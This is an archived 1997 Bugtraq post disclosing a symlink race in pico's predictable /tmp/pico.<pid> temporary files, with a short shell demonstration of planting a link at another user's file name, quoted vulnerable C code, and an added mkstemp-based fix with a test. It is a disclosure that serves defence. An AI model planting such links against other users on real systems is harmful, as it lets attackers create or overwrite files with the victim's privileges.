Bugtraq mailing list archives
Pine has a few more problems...
From: dynamo () IME NET (dynamo () IME NET)
Date: Tue, 2 Sep 1997 01:23:52 -0400
Hey all,
Since you're discussing pine, and its problems, here is something I
found while reading through the source for pico, the editor in pine. It
seems that there is a race condition here in the routines it uses to make
temporary files.
Cheers,
dynamo
ps: floydy, get to bed. you shouldn't be working at this hour.
here's the problem in action:
bring# ps axO user | grep pico
10420 notlumpy p4 I+ 0:00.04 pico
10366 lumpy p5 I+ 0:00.03 pico -w blahblah
bring# ln -s mark.sucks pico.10420
bring# ls -l
total 561
-rw-r--r-- 1 lumpy wheel 562100 Sep 1 19:34 L74874TMP.gz
lrwxrwxrwt 1 root wheel 10 Sep 2 01:20 pico.10420 -> mark.sucks
drwxr-xr-x 3 root wheel 512 Aug 30 21:38 screens
(at this point in another window I did a spell check,
one function that calls writetmp)
bring# ls -l
total 562
-rw-r--r-- 1 lumpy wheel 562100 Sep 1 19:34 L74874TMP.gz
-rw------- 1 notlumpy wheel 60 Sep 2 01:20 mark.sucks
drwxr-xr-x 3 root wheel 512 Aug 30 21:38 screens
bring#
here are some code snippets:
os_unix.c ffwopen
-----------------
/*
* Open a file for writing. Return TRUE if all is well, and FALSE on error
* (cannot create).
*/
ffwopen(fn)
char *fn;
{
    extern FILE *ffp;
    if ((ffp=fopen(fn, "w")) == NULL) {
        emlwrite("Cannot open file for writing", NULL);
        return (FIOERR);
    }
-----------------
os_unix.c tmpname
-----------------
/*
* tmpname - return a temporary file name in the given buffer
*/
void
tmpname(name)
char *name;
{
    sprintf(name, "/tmp/pico.%d", getpid()); /* tmp file name */
}
-----------------
file.c writetmp
-----------------
/*
 * writetmp - write a temporary file for message text, mindful of
 * access restrictions and included text. If n is true, include
 * lines that indicated included message text, otw forget them
 */
char *writetmp(f, n)
int f, n;
{
    static char fn[NFILEN];
    register int s;
    register LINE *lp;
    register int nline;
    tmpname(fn);
    if ((s=ffwopen(fn)) != FIOSUC) /* Open writes message. */
        return(NULL);
(code continues...)
-----------------
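
Added example, not part of the original post and not Pine's own code: one way to close the race shown above is to have mkstemp() create the file exclusively under an unpredictable name, instead of calling fopen() on /tmp/pico.<pid>. The function names and the /tmp/picodemo scratch directory are assumptions made for illustration.

```c
#define _XOPEN_SOURCE 700 /* mkstemp, mkdtemp, symlink, O_NOFOLLOW */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Replacement for the tmpname()+ffwopen() pair: mkstemp() chooses an
 * unpredictable name and creates it with O_CREAT|O_EXCL, mode 0600, so a
 * pre-planted link makes creation fail instead of being written through. */
FILE *open_tmp_safe(char *name, size_t len)
{
    int fd;
    FILE *fp;
    if (snprintf(name, len, "/tmp/pico.XXXXXX") >= (int)len)
        return NULL;                      /* buffer too small for template */
    if ((fd = mkstemp(name)) < 0)
        return NULL;
    if ((fp = fdopen(fd, "w")) == NULL) {
        close(fd);
        unlink(name);
    }
    return fp;
}

/* Where a fixed name must stay: create exclusively, never follow a link. */
int open_fixed_excl(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed check: 1 if a link planted at the predictable name is refused. */
int planted_link_is_refused(void)
{
    char dir[] = "/tmp/picodemo.XXXXXX", lnk[64], target[64];
    struct stat st;
    int fd = -1, ok;
    if (mkdtemp(dir) == NULL)             /* private scratch directory */
        return 0;
    snprintf(lnk, sizeof lnk, "%s/pico.%d", dir, (int)getpid());
    snprintf(target, sizeof target, "%s/victim", dir);
    ok = symlink(target, lnk) == 0 && (fd = open_fixed_excl(lnk)) < 0 &&
         (errno == EEXIST || errno == ELOOP) && stat(target, &st) != 0;
    if (fd >= 0) close(fd);
    unlink(lnk); unlink(target); rmdir(dir);
    return ok;
}
int main(void) { return planted_link_is_refused() ? 0 : 1; }
```

With the original fopen(fn, "w") the same planted link would be followed and its target created, which is the mark.sucks file in the listing above.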
